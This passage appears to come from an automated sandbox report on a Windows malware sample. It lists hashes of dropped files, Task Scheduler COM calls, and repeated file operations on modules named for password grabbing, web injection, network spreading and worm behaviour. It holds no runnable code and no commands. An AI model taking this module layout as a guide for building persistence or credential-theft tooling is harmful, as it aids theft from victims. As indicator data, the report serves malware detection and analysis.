SHA1: ece693ab628a17b5d572925f7eb361c61879ed61 SHA256: 99755825296d798f05089b5747382eae6d7b4691e3109ef21363e837149a3cb4 SSDeep: 384:f8ip6dC2AWGShPfXbMOfP0fNPLmEFqQ12TJPW:f8RdQW7PfXbM5zFFn12TJPW |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | 928 bytes |
MD5:
e74f7c2aacf9459d8412c96369d786fb
SHA1: 2eb4812bd7d99ffbd84d5381b71475574505d992 SHA256: 82fddb63f4725e9775e9e5e51c83030dd29e339678c3bf1f82931628fb7730af SSDeep: 24:Bbu1tph88ekE5QIvuI8DGrrRQkFLqiSMRjlbH5V6RUqaE:xqtpm8EXdpr2k8ejdH5VdqaE |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | 129.53 KB |
MD5:
cc9f120d816b196026d034e7409b8544
SHA1: 03e17fc20d16992a7d0b7137ce8748ad2ecffc6c SHA256: 6ddde728b3ee6369ffed441f095e0d973efe8e39db2b56d0d458c10f9ef1b9ac SSDeep: 3072:hGq0IAYKU55Ioa8g/up43AbPu9bc0l91aVcsmXwiCRyoRW:wq0n8Coa8eup4weQqswwxPW |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | 83.42 KB |
MD5:
fc0ba72f44f4f18f8580b1ed490dea30
SHA1: 98bfd5a30ede84fe45cc951db555b8accdda7620 SHA256: 5fe39efbea646a051b8c52b0e0ed99c23fe72e74fd19bbae22b18ae773b115d2 SSDeep: 1536:B4EJ3ipsjCHVwsL4Q1Uqh1DTY5xuiosEayrzSMEg1m+RAzVGoQ7IY3S:BFJ3qsjVsL4oh1/YLbosEayhmKoHwv3S |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_3912d7c0-2df4-4798-9de9-c60c58f001d5 | 1.02 KB |
MD5:
25182eaddd35243f1c663c9eef9bbbe6
SHA1: 6b011af171e9fc33e315660538cec3c34195e71e SHA256: af3275ba9dfd94740241eadb93eb66f282da7543e61ab2544d46d6c68e38ed3b SSDeep: 24:rKf5b6UKa6LXaZBwFgftYNIra4on9okhVBPYP:kb6U4XeBqnIWL2MBPI |
|
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (1663)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | settings.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | settings.ini | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | settings.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
